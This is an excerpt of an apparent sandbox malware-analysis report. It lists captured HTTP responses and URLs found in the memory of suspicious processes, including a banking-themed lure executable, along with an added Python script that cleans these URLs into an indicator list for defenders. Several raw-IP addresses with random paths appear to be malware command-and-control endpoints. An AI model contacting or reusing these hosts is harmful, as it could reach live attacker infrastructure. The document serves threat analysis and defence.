Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 21 Mar 2025 14:10:29 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 21 Mar 2025 14:10:29 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 21 Mar 2025 14:10:47 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
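The "String found in binary or memory" entries that follow mix real URLs with memory-carving residue: a truncated host (http://13.21), paths with trailing junk (/twetxppkkqVt, /bspqodujb~vZ, /buysxojjpcbeP) and one- or two-character fragments (/a, /E, /2X). The Python below is an added example, not part of the report, that reduces such entries to a clean indicator list before they go into a blocklist or hunt query. Its input is the URL field of the entries below, copied by hand; the minimum path length and the "longer path that merely extends a shorter one is residue" rule are heuristics assumed by the example.

```python
"""Reduce 'String found in binary or memory' URLs from a sandbox report to a
clean indicator list.  Added example, not part of the report: the minimum path
length and the prefix rule below are heuristics assumed here."""
import re
from collections import defaultdict
from typing import Optional, Tuple

# Sample input (constructed): the URL field of the memory-string entries below.
MEMORY_STRINGS = [
    "http://13.21",
    "http://13.213.51.196/",
    "http://13.213.51.196/2X",
    "http://13.213.51.196/2m",
    "http://13.213.51.196/bspqodujb",
    "http://13.213.51.196/bspqodujbngs",
    "http://13.213.51.196/eri",
    "http://13.213.51.196/qnwbdottpdjvb",
    "http://13.213.51.196/qnwbdottpdjvb588",
    "http://13.213.51.196/qnwbdottpdjvbs",
    "http://13.213.51.196/twetxppkkq",
    "http://13.213.51.196/twetxppkkqVt",
    "http://13.213.51.196/woywqgxcq",
    "http://13.213.51.196:80/bspqodujb~vZ",
    "http://13.213.51.196:80/qnwbdottpdjvbY",
    "http://13.213.51.196:80/twetxppkkq",
    "http://13.213.51.196:80/woywqgxcq",
    "http://3.229.117.57/",
    "http://3.229.117.57/12",
    "http://3.229.117.57/12E",
    "http://3.229.117.57/buysxojjpcbe",
    "http://3.229.117.57:80/buysxojjpcbeP",
    "http://52.11.240.239/",
    "http://52.11.240.239/Ad",
    "http://52.11.240.239/DM",
    "http://52.11.240.239/E",
    "http://52.11.240.239/a",
    "http://52.11.240.239/ahfjecsqgekcwio",
]

# A usable indicator needs a complete dotted-quad host; the path stops at the
# first character these URLs never contain, which cuts trailing junk like '~vZ'.
URL_RE = re.compile(
    r"^https?://(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?P<path>/[A-Za-z0-9_./-]*)?")
MIN_PATH = 5  # assumption: '/2X', '/eri', '/12E' are carving fragments, not endpoints


def parse_url(s: str) -> Optional[Tuple[str, str]]:
    """(host, path) for a string with a complete host, else None (truncated)."""
    m = URL_RE.match(s)
    if not m:
        return None
    return m.group("host"), m.group("path") or "/"


def normalize(strings) -> dict:
    """{host: sorted paths} after dropping truncated hosts, short fragments and
    paths that merely extend another path seen for the same host."""
    by_host = defaultdict(set)
    for s in strings:
        parsed = parse_url(s)
        if parsed is None:
            continue
        host, path = parsed
        if path == "/" or len(path) >= MIN_PATH:
            by_host[host].add(path)
    cleaned = {}
    for host, paths in by_host.items():
        # '/twetxppkkqVt' extends '/twetxppkkq': keep the shorter, drop the residue.
        keep = [p for p in paths
                if not any(q not in ("/", p) and p.startswith(q) for q in paths)]
        cleaned[host] = sorted(keep)
    return cleaned


def indicators(strings) -> list:
    """Flat http://host/path list, ready for a blocklist or a hunt query."""
    return ["http://%s%s" % (host, path)
            for host, paths in sorted(normalize(strings).items()) for path in paths]


if __name__ == "__main__":
    for ioc in indicators(MEMORY_STRINGS):
        print(ioc)
```

The prefix rule assumes that when both /abc and /abcdef appear for one host, the longer one is a carved fragment; a server that really serves both paths would lose a valid indicator, so compare the survivors against the HTTP traffic section above before acting on them.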
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.21
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/2X
Source: alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/2m
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/bspqodujb
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/bspqodujbngs
Source: niellist.exe, 00000003.00000002.1298601630.0000000000D07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/eri
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/qnwbdottpdjvb588
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/qnwbdottpdjvbs
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.00000000004FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/twetxppkkq
Source: alg.exe, 00000002.00000003.1339720537.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1558654635.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1346185101.00000000004F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/twetxppkkqVt
Source: niellist.exe, 00000003.00000002.1294142638.0000000000CCD000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196/woywqgxcq
Source: alg.exe, 00000002.00000003.1300228185.00000000004BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196:80/bspqodujb~vZ
Source: niellist.exe, 00000011.00000002.1411628662.0000000000B22000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196:80/qnwbdottpdjvbY
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340849614.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196:80/twetxppkkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://13.213.51.196:80/woywqgxcq
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.229.117.57/
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.229.117.57/12
Source: alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.229.117.57/12E
Source: alg.exe, 00000002.00000003.1312913508.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1313095660.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.229.117.57/buysxojjpcbe
Source: alg.exe, 00000002.00000003.1313095660.00000000004BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3.229.117.57:80/buysxojjpcbeP
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, niellist.exe, 00000011.00000002.1410876293.0000000000A08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/Ad
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/DM
Source: alg.exe, 00000002.00000003.1300228185.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/E
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp, Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwio
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1273923400.0000000000D75000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/ahfjecsqgekcwioro
Source: alg.exe, 00000002.00000003.1307290100.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1312913508.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1314920250.00000000004F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/arkfkq
Source: niellist.exe, 00000003.00000002.1298601630.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/bwejhhjeahxfje
Source: alg.exe, 00000002.00000003.1280251410.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1279607006.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/oqcvpoewhl-v
Source: alg.exe, 00000002.00000003.1307088264.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239/rkfkq
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1274105597.0000000000D98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239:80/ahfjecsqgekcwio
Source: alg.exe, 00000002.00000003.1307088264.00000000004BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239:80/arkfkq
Source: alg.exe, 00000002.00000003.1280251410.00000000004BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://52.11.240.239:80/oqcvpoewhl
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://72.52.178.23/uhxgrttve
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://72.52.178.23:80/uhxgrttve
Source: alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/J
Source: alg.exe, 00000002.00000003.1986704664.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/a
Source: alg.exe, 00000002.00000003.1559227442.00000000004C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000002.00000003.1770492535.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/iljywase
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/iljywasehv
Source: alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/kkjhdthfjo
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/kkjhdthfjouemm1$
Source: alg.exe, 00000002.00000003.1987338757.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/qlbvcaqfgtptt
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/qlbvcaqfgtpttqtS
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1772721366.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/iljywase
Source: alg.exe, 00000002.00000003.1558654635.0000000000513000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/kkjhdthfjoP
Source: alg.exe, 00000002.00000003.1987338757.0000000000511000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/qlbvcaqfgtpttcrobat
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE977000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microskW
Source: powershell.exe, 0000000E.00000002.1464480139.000001FEBE90C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: niellist.exe, 00000003.00000002.1293879138.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: XClient.exe, 0000000B.00000002.2539294552.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA62FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id19LR
